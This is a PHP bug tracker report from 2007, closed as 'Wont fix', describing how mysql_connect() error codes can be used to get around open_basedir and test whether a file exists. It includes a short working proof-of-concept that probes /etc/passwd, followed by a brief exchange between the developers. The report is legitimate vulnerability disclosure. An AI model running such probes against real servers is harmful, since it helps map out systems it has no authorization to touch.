php.net |  support |  documentation |  report a bug |  advanced search |  search howto |  statistics |  random bug |  login

go to bug id or search bugs for

Bug #41654 open_basedir bypass via mysql_connect()
Submitted: 2007-06-11 17:12 UTC Modified: 2007-06-15 18:02 UTC
Votes:2
Avg. Score:4.5 ± 0.5
Reproduced:2 of 2 (100.0%)
Same Version:1 (50.0%)
Same OS:1 (50.0%)
From: dr at peytz dot dk Assigned:
Status: Wont fix Package: Safe Mode/open_basedir
PHP Version: 5.2.3 OS: Linux
Private report: No CVE-ID: None
View Developer Edit
Welcome back! If you're the original bug submitter, here's where you can edit the bug or add additional notes.
If you forgot your password, you can retrieve your password here.
Password:
Status:
Package:
Bug Type:
Summary:
From: dr at peytz dot dk
New email:
PHP Version: OS:

 

 [2007-06-11 17:12 UTC] dr at peytz dot dk 
Description:
------------
file_exists() etc. does not allow checking the existence of files outside the directories specified in open_basedir.

This can be circumvented using mysql_connect(). The existence of a file can be checked using the example code below.


Reproduce code:
---------------
$filename = '/etc/passwd';
mysql_connect(':' . $filename);
$error = error_get_last();
if (strpos($error['message'], '(13)')) {
    print 'file exists';
} else {
    print 'file does not exist';
}

Patches

Pull Requests

History

AllCommentsChangesGit/SVN commitsRelated reports
 [2007-06-12 12:43 UTC] iliaa@php.net 
It is quite impractical for PHP to validate things like unix domain 
socket paths for all databases that support them to avoid open_basedir/
safe_mode bypasses. Had the bypass allowed reading of files, I could see 
the need to implement additional checks, but simple "presence" checks 
don't warrant hacks necessary to add such protection.
 [2007-06-15 18:02 UTC] dr at peytz dot dk 
In this case, PHP doesn't need to validate the socket path. It just shouldn't add the specific error code to the error string. I doubt many people will miss the "(13)" part of the error string.
 
PHP Copyright © 2001-2024 The PHP Group
All rights reserved. 		Last updated: Sun Dec 22 01:01:30 2024 UTC